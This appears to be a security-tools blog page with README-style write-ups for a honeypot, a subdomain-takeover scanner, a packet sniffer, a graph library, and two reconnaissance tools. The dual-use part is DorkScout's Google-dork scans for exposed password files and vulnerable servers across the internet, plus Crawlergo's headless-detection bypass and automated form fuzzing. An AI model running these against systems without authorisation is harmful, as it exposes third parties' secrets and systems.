
Fapro - Free, Cross-platform, Single-file mass network protocol server simulator

17 October 2021 at 20:30
By: Zion3R


FaPro is a fake protocol server tool that can easily start and stop multiple network services.

The goal is to support as many protocols as possible, and support as many deep interactions as possible for each protocol.


Features
  • Supported Running Modes:
    • Local Machine
    • Virtual Network
  • Supported Protocols:
    • DNS
    • DCE/RPC
    • EIP
    • Elasticsearch
    • FTP
    • HTTP
    • IEC 104
    • Memcached
    • Modbus
    • MQTT
    • MySQL
    • RDP
    • Redis
    • S7
    • SMB
    • SMTP
    • SNMP
    • SSH
    • Telnet
    • VNC
    • IMAP
    • POP3
  • Use TcpForward to forward network traffic
  • Supports TCP SYN logging

Protocol simulation demos

Rdp

Supports CredSSP NTLMv2 NLA authentication.

Supports configuring the image displayed at user login.


SSH

Supports user login.

Supports fake terminal commands, such as id, uid, whoami, etc.

Account format: username:password:home:uid
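For example (hypothetical credentials), root:toor:/root:0 defines a root account with password toor, home directory /root and uid 0.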


IMAP & SMTP

Supports user login and interaction.



Mysql

Supports SQL statement query interaction.



HTTP

Supports website cloning. You need to install the Chrome browser and ChromeDriver for this to work.


Quick Start

Generate Config

The configuration of all protocols and parameters is generated by the genConfig subcommand.

Use 172.16.0.0/16 subnet to generate the configuration file:

fapro genConfig -n 172.16.0.0/16 > fapro.json

Or use a local address instead of the virtual network:

fapro genConfig > fapro.json

Run the protocol simulator

Run FaPro in verbose mode and start the web service on port 8080:

fapro run -v -l :8080

TCP SYN logging

For Windows users, please install WinPcap or Npcap.


Log analysis

Use ELK to analyze protocol logs:



Configuration

This section contains the sample configuration used by FaPro.

{
  "version": "0.38",
  "network": "127.0.0.1/32",
  "network_build": "localhost",
  "storage": null,
  "geo_db": "/tmp/geoip_city.mmdb",
  "hostname": "fapro1",
  "use_logq": true,
  "cert_name": "unknown",
  "syn_dev": "any",
  "exclusions": [],
  "hosts": [
    {
      "ip": "127.0.0.1",
      "handlers": [
        {
          "handler": "dcerpc",
          "port": 135,
          "params": {
            "accounts": [
              "administrator:123456"
            ],
            "domain_name": "DESKTOP-Q1Test"
          }
        }
      ]
    }
  ]
}
  • version: Configuration version.
  • network: The subnet used by the virtual network, or the address bound to the local machine (local mode).
  • network_build: Network mode (supported values: localhost, all, userdef)
    • localhost: Local mode, all services listen on the local machine
    • all: Create all hosts in the subnet (i.e., every host in the subnet can be pinged)
    • userdef: Create only the hosts specified in the hosts configuration.
  • storage: Specify the storage used for log collection; supports sqlite, mysql and elasticsearch.
  • geo_db: MaxMind GeoIP2 database file path, used to generate IP geolocation information. If you use Elasticsearch storage, this field is not needed; the information is generated automatically by Elasticsearch's geoip processor.
  • hostname: Specify the host field in the log.
  • use_logq: Use a local disk message queue to save logs before sending them to remote MySQL or Elasticsearch, to prevent remote log loss.
  • cert_name: Common name of the generated certificate.
  • syn_dev: Specify the network interface used to capture TCP SYN packets. If it is empty, TCP SYN packets will not be recorded. On Windows, the device name looks like "\Device\NPF_{xxxx-xxxx}".
  • exclusions: Exclude remote IPs from logs.
  • hosts: Each item is a host configuration.
  • handlers: The services configured on the host; each item is a service configuration.
  • handler: Service name (i.e., protocol name)
  • params: Set the parameters supported by the service.
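As an illustration, the storage value is given as a URI; the Elasticsearch form used in the example below is:

"storage": "es://http://127.0.0.1:9200"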

Example

Create a virtual network with subnet 172.16.0.0/24 and two hosts:

172.16.0.3 runs the dns and ssh services,

and 172.16.0.5 runs the rpc and rdp services.

Protocol access logs are saved to Elasticsearch, excluding access logs from 127.0.0.1.

{
  "version": "0.38",
  "network": "172.16.0.0/24",
  "network_build": "userdef",
  "storage": "es://http://127.0.0.1:9200",
  "use_logq": true,
  "cert_name": "unknown",
  "syn_dev": "any",
  "geo_db": "",
  "exclusions": ["127.0.0.1"],
  "hosts": [
    {
      "ip": "172.16.0.3",
      "handlers": [
        {
          "handler": "dns",
          "port": 53,
          "params": {
            "accounts": [
              "admin:123456"
            ],
            "appname": "domain"
          }
        },
        {
          "handler": "ssh",
          "port": 22,
          "params": {
            "accounts": [
              "root:5555555:/root:0"
            ],
            "prompt": "$ ",
            "server_version": "SSH-2.0-OpenSSH_7.4"
          }
        }
      ]
    },
    {
      "ip": "172.16.0.5",
      "handlers": [
        {
          "handler": "dcerpc",
          "port": 135,
          "params": {
            "accounts": [
              "administrator:123456"
            ],
            "domain_name": "DESKTOP-Q1Test"
          }
        },
        {
          "handler": "rdp",
          "port": 3389,
          "params": {
            "accounts": [
              "administrator:123456"
            ],
            "auth": false,
            "domain_name": "DESKTOP-Q1Test",
            "image": "rdp.jpg",
            "sec_layer": "auto"
          }
        }
      ]
    }
  ]
}

FAQ

We have collected some frequently asked questions. Before reporting an issue, please search if the FAQ has the answer to your problem.


Contributing
  • Issues are welcome.


DorkScout - Golang Tool To Automate Google Dork Scan Against The Entire Internet Or Specific Targets

17 October 2021 at 11:30
By: Zion3R


dorkscout is a tool to automate the discovery of vulnerable applications and secret files around the internet through Google searches. dorkscout first fetches the dork lists from https://www.exploit-db.com/google-hacking-database and then scans a given target, or everything it finds.


Installation

dorkscout can be installed in different ways:


Go Packages

through Go packages (the Golang package manager)

go get github.com/R4yGM/dorkscout

this will work on every platform


Docker

if you don't have Docker installed you can follow their guide

first of all, you have to pull the docker image (only 17.21 MB) from the docker registry; you can see it here

docker pull r4yan/dorkscout:latest

if you don't want to pull the image, you can download or copy the dorkscout Dockerfile that can be found here and then build the image from the Dockerfile

then, if you want to launch the container, you first have to create a volume to share your files with the container

docker volume create --name dorkscout_data

when you launch the container using docker, it will automatically install the dork lists inside a directory called "dorkscout":

-rw-r--r-- 1 r4yan r4yan   110 Jul 31 14:56  .dorkscout
-rw-r--r-- 1 r4yan r4yan 79312 Aug 10 20:30 'Advisories and Vulnerabilities.dorkscout'
-rw-r--r-- 1 r4yan r4yan 6352 Jul 31 14:56 'Error Messages.dorkscout'
-rw-r--r-- 1 r4yan r4yan 38448 Jul 31 14:56 'Files Containing Juicy Info.dorkscout'
-rw-r--r-- 1 r4yan r4yan 17110 Jul 31 14:56 'Files Containing Passwords.dorkscout'
-rw-r--r-- 1 r4yan r4yan 1879 Jul 31 14:56 'Files Containing Usernames.dorkscout'
-rw-r--r-- 1 r4yan r4yan 5398 Jul 31 14:56 Footholds.dorkscout
-rw-r--r-- 1 r4yan r4yan 5568 Jul 31 14:56 'Network or Vulnerability Data.dorkscout'
-rw-r--r-- 1 r4yan r4yan 49048 Jul 31 14:56 'Pages Containing Login Portals.dorkscout'
-rw-r--r-- 1 r4yan r4yan 16112 Jul 31 14:56 'Sensitive Directories.dorkscout'
-rw-r--r-- 1 r4yan r4yan 451 Jul 31 14:56 'Sensitive Online Shopping Info.dorkscout'
-rw-r--r-- 1 r4yan r4yan 29938 Jul 31 14:56 'Various Online Devices.dorkscout'
-rw-r--r-- 1 r4yan r4yan 2802 Jul 31 14:56 'Vulnerable Files.dorkscout'
-rw-r--r-- 1 r4yan r4yan 4925 Jul 31 14:56 'Vulnerable Servers.dorkscout'
-rw-r--r-- 1 r4yan r4yan 8145 Jul 31 14:56 'Web Server Detection.dorkscout'

so you don't have to install them yourself; then you can start scanning by doing:

docker run -v dorkscout_data:/dorkscout r4yan/dorkscout scan <options>

replace <options> with the options/arguments you want to give to dorkscout, for example:

docker run -v dorkscout_data:/dorkscout r4yan/dorkscout scan -d="/dorkscout/Sensitive Online Shopping Info.dorkscout" -H="/dorkscout/a.html"

If you want to scan through a proxy using a docker container, you have to add the --net host option, for example:

docker run --net host -v dorkscout_data:/dorkscout r4yan/dorkscout scan -d="/dorkscout/Sensitive Online Shopping Info.dorkscout" -H="/dorkscout/a.html" -x socks5://127.0.0.1:9050

Always save your results inside the volume and not in the container, otherwise the results will be deleted! You can save them by writing to the same volume path as the directory where you are saving the results.

if you added this and did everything correctly, at the end of every scan you'll find the results inside the folder /var/lib/docker/volumes/dorkscout_data/_data

this will work on every platform


Executable

you can also download the already compiled binaries here and then execute them


Usage
dorkscout -h
Usage:
  dorkscout [command]

Available Commands:
  completion  generate the autocompletion script for the specified shell
  delete      deletes all the .dorkscout files inside a given directory
  help        Help about any command
  install     installs a list of dorks from exploit-db.com
  scan        scans a specific website, or all the websites it finds, for a list of dorks

Flags:
  -h, --help   help for dorkscout

Use "dorkscout [command] --help" for more information about a command.

to start scanning with a wordlist and a proxy, which will then return the results in HTML format:

dorkscout scan -d="/dorkscout/Sensitive Online Shopping Info.dorkscout" -H="/dorkscout/a.html" -x socks5://127.0.0.1:9050

results :



Install wordlists

to start scanning you'll need some dork lists, and you can install them through the install command

dorkscout install --output-dir /dorks

and this will fetch all the available dorks from exploit-db.com

[+] ./Advisories and Vulnerabilities.dorkscout
[+] ./Vulnerable Files.dorkscout
[+] ./Files Containing Juicy Info.dorkscout
[+] ./Sensitive Online Shopping Info.dorkscout
[+] ./Files Containing Passwords.dorkscout
[+] ./Vulnerable Servers.dorkscout
[+] ./Various Online Devices.dorkscout
[+] ./Pages Containing Login Portals.dorkscout
[+] ./Footholds.dorkscout
[+] ./Error Messages.dorkscout
[+] ./Files Containing Usernames.dorkscout
[+] ./Network or Vulnerability Data.dorkscout
[+] ./.dorkscout
[+] ./Sensitive Directories.dorkscout
[+] ./Web Server Detection.dorkscout
2021/08/11 19:02:45 Installation finished in 2.007928 seconds on /dorks


Domain-Protect - Protect Against Subdomain Takeover

16 October 2021 at 20:30
By: Zion3R


Protect Against Subdomain Takeover

  • scans Amazon Route53 across an AWS Organization for domain records vulnerable to takeover
  • vulnerable domains in Google Cloud DNS can be detected by Domain Protect for GCP

deploy to security audit account



scan your entire AWS Organization



receive alerts by Slack or email



or manually scan from your laptop



subdomain detection functionality

Scans Amazon Route53 to identify:

  • Alias records for CloudFront distributions with missing S3 origin
  • CNAME records for CloudFront distributions with missing S3 origin
  • ElasticBeanstalk Alias records vulnerable to takeover
  • ElasticBeanstalk CNAMES vulnerable to takeover
  • Registered domains with missing hosted zones
  • Subdomain NS delegations vulnerable to takeover
  • S3 Alias records vulnerable to takeover
  • S3 CNAMES vulnerable to takeover
  • Vulnerable CNAME records for Azure resources
  • CNAME records for missing Google Cloud Storage buckets

optional additional check

Turned off by default as it may result in Lambda timeouts for large organisations

  • A records for missing storage buckets, e.g. Google Cloud Load Balancer with missing backend storage

To enable, create this Terraform variable in your tfvars file or CI/CD pipeline:

lambdas = ["alias-cloudfront-s3", "alias-eb", "alias-s3", "cname-cloudfront-s3", "cname-eb", "cname-s3", "ns-domain", "ns-subdomain", "cname-azure", "cname-google", "a-storage"]

options
  1. scheduled lambda functions with email and Slack alerts, across an AWS Organization, deployed using Terraform
  2. manual scans run from your laptop or CloudShell, in a single AWS account

notifications
  • Slack channel notification per vulnerability type, listing account names and vulnerable domains
  • Email notification in JSON format with account names, account IDs and vulnerable domains by subscribing to SNS topic

requirements
  • Security audit account within AWS Organizations
  • Security audit read-only role with an identical name in every AWS account of the Organization
  • Storage bucket for Terraform state file
  • Terraform 1.0.x

usage
  • replace the Terraform state S3 bucket fields in the command below as appropriate
  • for local testing, duplicate terraform.tfvars.example, rename without the .example suffix
  • enter details appropriate to your organization and save
  • alternatively enter Terraform variables within your CI/CD pipeline
terraform init -backend-config=bucket=TERRAFORM_STATE_BUCKET -backend-config=key=TERRAFORM_STATE_KEY -backend-config=region=TERRAFORM_STATE_REGION
terraform workspace new dev
terraform plan
terraform apply

AWS IAM policies

For least privilege access control, example AWS IAM policies are provided:


adding new checks
  • create a new subdirectory within the terraform-modules/lambda/code directory
  • add Python code file with same name as the subdirectory
  • add the name of the file without extension to var.lambdas in variables.tf
  • add a subdirectory within the terraform-modules/lambda/build directory, following the existing naming pattern
  • add a .gitkeep file into the new directory
  • update the .gitignore file following the pattern of existing directories
  • apply Terraform

adding notifications to extra Slack channels
  • add an extra channel to your slack_channels variable list
  • add an extra webhook URL or repeat the same webhook URL to your slack_webhook_urls variable list
  • apply Terraform

testing
  • use multiple Terraform workspace environments, e.g. dev, prd
  • use the slack_channels_dev variable for your dev environment to notify a test Slack channel
  • for new subdomain takeover categories, create correctly configured and vulnerable domain names in Route53
  • minimise the risk of malicious takeover by using a test domain, with domain names which are hard to enumerate
  • remove any vulnerable domains as soon as possible

ci/cd
  • infrastructure has been deployed using CircleCI
  • environment variables to be entered in CircleCI project settings:
ENVIRONMENT VARIABLE               EXAMPLE VALUE / COMMENT
AWS_ACCESS_KEY_ID                  using domain-protect deploy policy
AWS_SECRET_ACCESS_KEY              -
TERRAFORM_STATE_BUCKET             tfstate48903
TERRAFORM_STATE_KEY                domain-protect
TERRAFORM_STATE_REGION             us-east-1
TF_VAR_org_primary_account         012345678901
TF_VAR_security_audit_role_name    not needed if "domain-protect-audit" used
TF_VAR_external_id                 only required if External ID is configured
TF_VAR_slack_channels              ["security-alerts"]
TF_VAR_slack_channels_dev          ["security-alerts-dev"]
TF_VAR_slack_webhook_urls          ["https://hooks.slack.com/services/XXX/XXX/XXX"]
  • to validate an updated CircleCI configuration:
docker run -v `pwd`:/whatever circleci/circleci-cli circleci config validate /whatever/.circleci/config.yml

limitations
  • this tool cannot guarantee 100% protection against subdomain takeover
  • it currently only scans Amazon Route53, and only checks a limited number of takeover types
  • vulnerable domains in Google Cloud DNS can be detected by Domain Protect for GCP






Packet-Sniffer - A pure-Python Network Packet Sniffing Tool

16 October 2021 at 11:30
By: Zion3R


A simple pure-Python network packet sniffer. Packets are disassembled as they arrive at a given network interface controller and their information is displayed on the screen.

This application maintains no dependencies on third-party modules and can be run by any Python 3.x interpreter.


Installation

GNU / Linux

Simply clone this repository with git clone and execute the packet_sniffer.py file as described in the following Usage section.

user@host:~/DIR$ git clone https://github.com/EONRaider/Packet-Sniffer.git

Other Systems

This project is dependent on PF_PACKET - a stateful packet filter not found on Windows or Mac OS X. For demonstration purposes, you can try out this package in a Docker container. Although it will not have full access to localhost on your machine, you can still sniff on the Docker subnet and at least get the module running.
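For illustration only (this is not the project's code), a minimal sketch of the PF_PACKET mechanism the sniffer relies on, using Python's AF_PACKET raw sockets on Linux (requires root):

import socket
import struct

# A raw AF_PACKET socket receives complete layer-2 frames (Linux only).
# 0x0003 is ETH_P_ALL (capture every protocol), passed in network byte order.
sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0003))
frame, _ = sock.recvfrom(65535)

# The first 14 bytes are the Ethernet header: dst MAC, src MAC, EtherType.
dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
mac = lambda b: ":".join(f"{x:02x}" for x in b)
print(f"[+] MAC {mac(src)} -> {mac(dst)} | EtherType: {hex(ethertype)}")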

Use this command to build and run from the project directory:

docker build -t sniff . && docker run --network host sniff

Note that the entry command is simply python packet_sniffer.py, so feel free to use the full functionality of the module by overriding the default command. Remember that we tagged the container with the name "sniff" before, so we can pass command-line arguments to the sniffer in the following manner:

docker run --network host sniff [your command goes here]
echo "Now let's print help"
docker run --network host sniff python packet_sniffer.py --help

Usage of --network host is not supported on OS X or Windows so this container won't be fully functional - but you will see packets traveling within the docker subnet.


Usage
packet_sniffer.py [-h] [-i INTERFACE] [-d]

A pure-Python network packet sniffer.

optional arguments:
  -h, --help            show this help message and exit
  -i INTERFACE, --interface INTERFACE
                        Interface from which packets will be captured (captures
                        from all available interfaces by default).
  -d, --displaydata     Output packet data during capture.

Running the Application
Objective: Initiate the capture of packets on all available interfaces
Execution: sudo python3 packet_sniffer.py
Outcome:   Refer to sample output below
  • Sample output:
[>] Packet #476 at 17:45:13:
[+] MAC ......ae:45:39:30:8f:5a -> dc:d9:ae:71:c8:b9
[+] IPv4 ..........192.168.1.65 -> 140.82.113.3 | PROTO: TCP TTL: 64
[+] TCP ..................40820 -> 443 | Flags: 0x010 > ACK
[>] Packet #477 at 17:45:14:
[+] MAC ......dc:d9:ae:71:c8:b9 -> ae:45:39:30:8f:5a
[+] IPv4 ..........140.82.113.3 -> 192.168.1.65 | PROTO: TCP TTL: 49
[+] TCP ....................443 -> 40820 | Flags: 0x010 > ACK
[>] Packet #478 at 17:45:18:
[+] MAC ......dc:d9:ae:71:c8:b9 -> ae:45:39:30:8f:5a
[+] ARP Who has 192.168.1.65 ? -> Tell 192.168.1.254
[>] Packet #479 at 17:45:18:
[+] MAC ......ae:45:39:30:8f:5a -> dc:d9:ae:71:c8:b9
[+] ARP ...........192.168.1.65 -> Is at ae:45:39:30:8f:5a

Legal Disclaimer

The use of code contained in this repository, either in part or in its totality, for engaging targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws.

Developers assume no liability and are not responsible for misuses or damages caused by any code contained in this repository in any event that, accidentally or otherwise, it comes to be utilized by a threat agent or unauthorized entity as a means to compromise the security, privacy, confidentiality, integrity, and/or availability of systems and their associated resources by leveraging the exploitation of known or unknown vulnerabilities present in said systems, including, but not limited to, the implementation of security controls, human- or electronically-enabled.

The use of this code is only endorsed by the developers in those circumstances directly related to educational environments or authorized penetration testing engagements whose declared purpose is that of finding and mitigating vulnerabilities in systems, limiting their exposure to compromises and exploits employed by malicious agents as defined in their respective threat models.



Crawlergo - A Powerful Browser Crawler For Web Vulnerability Scanners

15 October 2021 at 20:30
By: Zion3R


crawlergo is a browser crawler that uses chrome headless mode for URL collection. It hooks key positions across the whole web page during the DOM rendering stage, automatically fills and submits forms, intelligently triggers JS events, and collects as many entries exposed by the website as possible. The built-in URL de-duplication module filters out a large number of pseudo-static URLs, maintains a fast parsing and crawling speed even for large websites, and finally produces a high-quality collection of request results.

crawlergo currently supports the following features:

  • chrome browser environment rendering
  • Intelligent form filling, automated submission
  • Full DOM event collection with automated triggering
  • Smart URL de-duplication to remove most duplicate requests
  • Intelligent analysis of web pages and collection of URLs, including javascript file content, page comments, robots.txt files and automatic Fuzz of common paths
  • Support Host binding, automatically fix and add Referer
  • Support browser request proxy
  • Support pushing the results to passive web vulnerability scanners

Installation

Please read and confirm the disclaimer carefully before installing and using.

Build

cd crawlergo/cmd/crawlergo
go build crawlergo_cmd.go
  1. crawlergo relies only on the chrome environment to run; go to download the new version of chromium, or just click to download Linux version 79.
  2. Go to the download page for the latest version of crawlergo and extract it to any directory. If you are on Linux or macOS, please give crawlergo executable permissions (+x).
  3. Or you can modify the code and build it yourself.

If you are using a linux system and chrome prompts you with missing dependencies, please see TroubleShooting below


Quick Start

Go!

Assuming your chromium installation directory is /tmp/chromium/, set up 10 tabs open at the same time and crawl testphp.vulnweb.com:

./crawlergo -c /tmp/chromium/chrome -t 10 http://testphp.vulnweb.com/

Using Proxy
./crawlergo -c /tmp/chromium/chrome -t 10 --request-proxy socks5://127.0.0.1:7891 http://testphp.vulnweb.com/

Calling crawlergo with python

By default, crawlergo prints the results directly on the screen. We next set the output mode to json, and the sample code for calling it using python is as follows:

#!/usr/bin/python3
# coding: utf-8

import simplejson
import subprocess


def main():
    target = "http://testphp.vulnweb.com/"
    cmd = ["./crawlergo", "-c", "/tmp/chromium/chrome", "-o", "json", target]
    rsp = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    output, error = rsp.communicate()
    # "--[Mission Complete]--" is the end-of-task separator string
    result = simplejson.loads(output.decode().split("--[Mission Complete]--")[1])
    req_list = result["req_list"]
    print(req_list[0])


if __name__ == '__main__':
    main()

Crawl Results

When the output mode is set to json, the returned result, after JSON deserialization, contains four parts:

  • all_req_list: All requests found during this crawl task, containing any resource type from other domains.
  • req_list: Returns the current domain results of this crawl task, pseudo-statically de-duplicated, without static resource links. It is a subset of all_req_list.
  • all_domain_list: List of all domains found.
  • sub_domain_list: List of subdomains found.
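A sketch of consuming these fields, continuing the Python example above (the per-request field names url and method are assumptions, not a documented schema):

# Continuing inside main() from the earlier example:
for req in result["req_list"]:
    # each entry is assumed to expose at least a URL and an HTTP method
    print(req.get("method", "GET"), req.get("url"))
print("domains:", len(result["all_domain_list"]),
      "subdomains:", len(result["sub_domain_list"]))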

Examples

crawlergo returns the full request and URL, which can be used in a variety of ways:

  • Used in conjunction with other passive web vulnerability scanners

    First, start a passive scanner and set the listening address to: http://127.0.0.1:1234/

    Next, assuming crawlergo is on the same machine as the scanner, start crawlergo and set the parameters (a complete invocation is sketched after this list):

    --push-to-proxy http://127.0.0.1:1234/

  • Host binding (not available for high version chrome) (example)

  • Custom Cookies (example)

  • Regularly clean up zombie processes generated by crawlergo (example), contributed by @ring04h
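Combining the flags shown earlier, a complete invocation that pushes results to a local passive scanner might look like this (addresses reuse the example values above):

./crawlergo -c /tmp/chromium/chrome -t 10 --push-to-proxy http://127.0.0.1:1234/ http://testphp.vulnweb.com/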


Bypass headless detect

crawlergo can bypass headless mode detection by default.

https://intoli.com/blog/not-possible-to-block-chrome-headless/chrome-headless-test.html



TroubleShooting
  • 'Fetch.enable' wasn't found

    Fetch is a feature supported by newer versions of chrome; if this error occurs, your version is too old, so please upgrade chrome.

  • chrome runs with missing dependencies such as xxx.so

    // Ubuntu
    apt-get install -yq --no-install-recommends \
    libasound2 libatk1.0-0 libc6 libcairo2 libcups2 libdbus-1-3 \
    libexpat1 libfontconfig1 libgcc1 libgconf-2-4 libgdk-pixbuf2.0-0 libglib2.0-0 libgtk-3-0 libnspr4 \
    libpango-1.0-0 libpangocairo-1.0-0 libstdc++6 libx11-6 libx11-xcb1 libxcb1 \
    libxcursor1 libxdamage1 libxext6 libxfixes3 libxi6 libxrandr2 libxrender1 libxss1 libxtst6 libnss3

    // CentOS 7
    sudo yum install pango.x86_64 libXcomposite.x86_64 libXcursor.x86_64 libXdamage.x86_64 libXext.x86_64 libXi.x86_64 \
    libXtst.x86_64 cups-libs.x86_64 libXScrnSaver.x86_64 libXrandr.x86_64 GConf2.x86_64 alsa-lib.x86_64 atk.x86_64 gtk3.x86_64 \
    ipa-gothic-fonts xorg-x11-fonts-100dpi xorg-x11-fonts-75dpi xorg-x11-utils xorg-x11-fonts-cyrillic xorg-x11-fonts-Type1 xorg-x11-fonts-misc -y

    sudo yum update nss -y
  • Run prompt Navigation timeout / browser not found / don't know correct browser executable path

    Make sure the browser executable path is configured correctly, type: chrome://version in the address bar, and find the executable file path:


Parameters

Required parameters
  • --chromium-path Path, -c Path The path to the chrome executable. (Required)

Basic parameters
  • --custom-headers Headers Customize the HTTP header. Please pass in the data after JSON serialization, this is globally defined and will be used for all requests. (Default: null)
  • --post-data PostData, -d PostData POST data. (Default: null)
  • --max-crawled-count Number, -m Number The maximum number of tasks for crawlers to avoid long crawling time due to pseudo-static. (Default: 200)
  • --filter-mode Mode, -f Mode Filtering mode, simple: only static resources and duplicate requests are filtered. smart: with the ability to filter pseudo-static. strict: stricter pseudo-static filtering rules. (Default: smart)
  • --output-mode value, -o value Result output mode, console: print the glorified results directly to the screen. json: print the json serialized string of all results. none: don't print the output. (Default: console)
  • --output-json filepath Write the result to the specified file after JSON serializing it. (Default: null)
  • --request-proxy proxyAddress socks5 proxy address, all network requests from crawlergo and chrome browser are sent through the proxy. (Default: null)

Expand input URL
  • --fuzz-path Use the built-in dictionary for path fuzzing. (Default: false)
  • --fuzz-path-dict Customize the Fuzz path by passing in a dictionary file path, e.g. /home/user/fuzz_dir.txt, each line of the file represents a path to be fuzzed. (Default: null)
  • --robots-path Resolve the path from the /robots.txt file. (Default: false)

Form auto-fill
  • --ignore-url-keywords, -iuk URL keyword that you don't want to visit, generally used to exclude logout links when customizing cookies. Usage: -iuk logout -iuk exit. (default: "logout", "quit", "exit")
  • --form-values, -fv Customize the value of the form fill, set by text type. Support definition types: default, mail, code, phone, username, password, qq, id_card, url, date and number. Text types are identified by the four attribute value keywords id, name, class, type of the input box label. For example, define the mailbox input box to be automatically filled with A and the password input box to be automatically filled with B, -fv mail=A -fv password=B.Where default represents the fill value when the text type is not recognized, as "Cralwergo". (Default: Cralwergo)
  • --form-keyword-values, -fkv Customize the value of the form fill, set by keyword fuzzy match. The keyword matches the four attribute values of id, name, class, type of the input box label. For example, fuzzy match the pass keyword to fill 123456 and the user keyword to fill admin, -fkv user=admin -fkv pass=123456. (Default: Cralwergo)

Advanced settings for the crawling process
  • --incognito-context, -i Browser start incognito mode. (Default: true)
  • --max-tab-count Number, -t Number The maximum number of tabs the crawler can open at the same time. (Default: 8)
  • --tab-run-timeout Timeout Maximum runtime for a single tab page. (Default: 20s)
  • --wait-dom-content-loaded-timeout Timeout The maximum timeout to wait for the page to finish loading. (Default: 5s)
  • --event-trigger-interval Interval The interval when the event is triggered automatically, generally used in the case of slow target network and DOM update conflicts that lead to URL miss capture. (Default: 100ms)
  • --event-trigger-mode Value DOM event auto-triggered mode, with async and sync, for URL miss-catching caused by DOM update conflicts. (Default: async)
  • --before-exit-delay Delay exit to close chrome at the end of a single tab task. Used to wait for partial DOM updates and XHR requests to be captured. (Default: 1s)

Other
  • --push-to-proxy The listener address of the crawler result to be received, usually the listener address of the passive scanner. (Default: null)
  • --push-pool-max The maximum number of concurrency when sending crawler results to the listening address. (Default: 10)
  • --log-level Logging levels, debug, info, warn, error and fatal. (Default: info)
  • --no-headless Turn off chrome headless mode to visualize the crawling process. (Default: false)

Follow me

Weibo: @9ian1i Twitter: @9ian1i

Related articles: A browser crawler practice for web vulnerability scanning



Networkit - A Growing Open-Source Toolkit For Large-Scale Network Analysis

15 October 2021 at 11:30
By: Zion3R



NetworKit is an open-source tool suite for high-performance network analysis. Its aim is to provide tools for the analysis of large networks in the size range from thousands to billions of edges. For this purpose, it implements efficient graph algorithms, many of them parallel to utilize multicore architectures. These are meant to compute standard measures of network analysis. NetworKit is focused on scalability and comprehensiveness. NetworKit is also a testbed for algorithm engineering and contains novel algorithms from recently published research (see list of publications below).

NetworKit is a Python module. High-performance algorithms are written in C++ and exposed to Python via the Cython toolchain. Python in turn gives us the ability to work interactively and a rich environment of tools for data analysis and scientific computing. Furthermore, NetworKit's core can be built and used as a native library if needed.


Requirements

You will need the following software to install NetworKit as a python package:

  • A modern C++ compiler, e.g.: g++ (>= 6.1), clang++ (>= 3.9) or MSVC (>= 14.13)
  • OpenMP for parallelism (usually ships with the compiler)
  • Python3 (3.6 or higher is supported)
    • Development libraries for Python3. The package name depends on your distribution. Examples:
      • Debian/Ubuntu: apt-get install python3-dev
      • RHEL/CentOS: dnf install python3-devel
      • Windows: Use the official release installer from www.python.org
  • Pip
  • CMake version 3.6 or higher (Advised to use system packages if available. Alternative: pip3 install cmake)
  • Build system: Make or Ninja
  • Cython version 0.29 or higher (e.g., pip3 install cython)

Install

In order to use NetworKit, you can either install it via package managers or build the Python module from source.


Install via package manager

While the most recent version is in general available for all package managers, the number of older downloadable versions differs.


pip
pip3 install [--user] networkit

conda (channel conda-forge)
conda config --add channels conda-forge
conda install networkit [-c conda-forge]

brew
brew install networkit

spack
spack install py-networkit

Building the Python module from source
git clone https://github.com/networkit/networkit networkit
cd networkit
python3 setup.py build_ext [-jX]
pip3 install -e .

The script will call cmake and ninja (make as fallback) to compile NetworKit as a library, build the extensions and copy them to the top folder. By default, NetworKit will be built using all available cores in optimized mode. You can add the option -jN to set the number of threads used for compilation.


Usage example

To get an overview and learn about NetworKit's different functions/classes, have a look at our interactive notebooks-section, especially the Networkit UserGuide. Note: To view and edit the computed output from the notebooks, it is recommended to use Jupyter Notebook. This requires the prior installation of NetworKit. You should really check that out before you start working on your network analysis.

We also provide a Binder-instance of our notebooks. To access this service, you can either click on the badge at the top or follow this link. Disclaimer: Due to rebuilds of the underlying image, it can take some time until your Binder instance is ready for usage.

If you only want a quick look at how NetworKit is used, the following example provides a glimpse. Here we generate a random hyperbolic graph with 100k nodes and compute its communities with the PLM method:

>>> import networkit as nk
>>> g = nk.generators.HyperbolicGenerator(1e5).generate()
>>> communities = nk.community.detectCommunities(g, inspect=True)
PLM(balanced,pc,turbo) detected communities in 0.14577102661132812 [s]
solution properties:
-------------------  -----------
# communities        4536
min community size   1
max community size   2790
avg. community size  22.0459
modularity           0.987243
-------------------  -----------
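The returned communities object is a partition of the node set, so the figures above can also be queried programmatically; a short sketch using the Partition and quality-measure APIs (values taken from the run above):

>>> communities.numberOfSubsets()
4536
>>> nk.community.Modularity().getQuality(communities, g)
0.987243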

Install the C++ Core only

In case you only want to work with NetworKit's C++ core, you can either install it via package managers or build it from source.


Install C++ core via package manager

conda (channel conda-forge)
conda config --add channels conda-forge
conda install libnetworkit [-c conda-forge]

brew
brew install libnetworkit

spack
spack install libnetworkit

Building the C++ core from source

We recommend CMake and your preferred build system for building the C++ part of NetworKit.

The following description shows how to use CMake in order to build the C++ Core only:

First you have to create and change to a build directory: (in this case named build)

mkdir build
cd build

Then call CMake to generate files for the make build system, specifying the directory of the root CMakeLists.txt file (e.g., ..). After this, make is called to start the build process:

cmake ..
make -jX

To speed up compilation with make on a multi-core machine, you can append -jX, where X denotes the number of threads to compile with.


Use NetworKit as a library

This paragraph explains how to use the NetworKit core C++ library in case it has been built from source. For how to use it when installed via package managers, best refer to the official documentation (brew, conda, spack).

In order to use the previously compiled networkit library, you need to have it installed and link it while compiling your project. Use these instructions to compile and install NetworKit in /usr/local:

cmake ..
make -jX install

Once NetworKit has been installed, you can use include directives in your C++-application as follows:

#include <networkit/graph/Graph.hpp>

You can compile your source as follows:

g++ my_file.cpp -lnetworkit

Unit tests

Building and running NetworKit unit tests is not mandatory. However, as a developer you might want to write and run unit tests for your code, or if you experience any issues with NetworKit, you might want to check if NetworKit runs properly. The unit tests can only be run from a clone or copy of the repository and not from a pip installation. In order to run the unit tests, you need to compile them first. This is done by setting the CMake NETWORKIT_BUILD_TESTS flag to ON:

cmake -DNETWORKIT_BUILD_TESTS=ON ..

Unit tests are implemented using GTest macros such as TEST_F(CentralityGTest, testBetweennessCentrality). Single tests can be executed with:

./networkit_tests --gtest_filter=CentralityGTest.testBetweennessCentrality

